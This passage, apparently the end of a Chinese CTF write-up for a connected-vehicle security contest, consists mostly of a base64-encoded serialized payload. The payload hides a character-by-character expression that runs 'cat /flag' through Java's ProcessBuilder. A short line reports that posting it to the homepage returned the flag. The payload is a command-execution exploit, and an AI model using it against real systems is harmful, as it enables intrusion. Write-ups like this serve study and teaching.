Ch0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoODIpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTAxKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDk3KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE0KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDQwKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExMClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE5KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDMyKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwNilbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5NylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTgpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoOTcpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDYpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTA4KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDk3KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExMClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDMpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDYpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoODApWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE0KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExMSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5OSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE1KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExNSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg2NilbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTcpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTA1KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwOClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDApWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTAxKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExNClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg0MClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygzNClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5OSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5NylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTYpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDcpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTAyKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwOClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5NylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDMpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDYpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE1KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExNilbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5NylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE2KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDQwKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDQxKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDQ2KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE2KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDczKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExMClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTIpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE3KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExNilbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg4MylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTYpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE0KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5NylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDkpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDApWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzIpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNzEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNjYpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNzUpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDYpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE0KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5NylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDApWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNzYpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTA1KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExMClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDApWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDMpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzkpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzQpWzBdLnRvU3RyaW5nKCkpKXQAB2FhYWFhYWF0AAZhYWFhYWF4

在首页直接传递post数据,成功获取到flag:

img

智能网联汽车 天融信杯 信息安全攻防赛WP

https://iloli.moe/2023/06/30/智能网联汽车-天融信杯-信息安全攻防赛WP/

Author

IceCliffs

Posted on

2023-06-30

Updated on

2025-01-05

Licensed under

#

Like this article? Support the author with

Comments

Follow

Catalogue

Links

Categories

Recents

Tags

CTF21
CVEs2
Coding7
Computer Network2
Crypto1
DN421
HAM5
HackTheBox6
Hacking14
Hardware4
Music1
OS3
Pwn1
Red Team9
Tetris1
VB7
WEB31
Web Security5
Writeup20
pwn1
开箱1
随笔11
×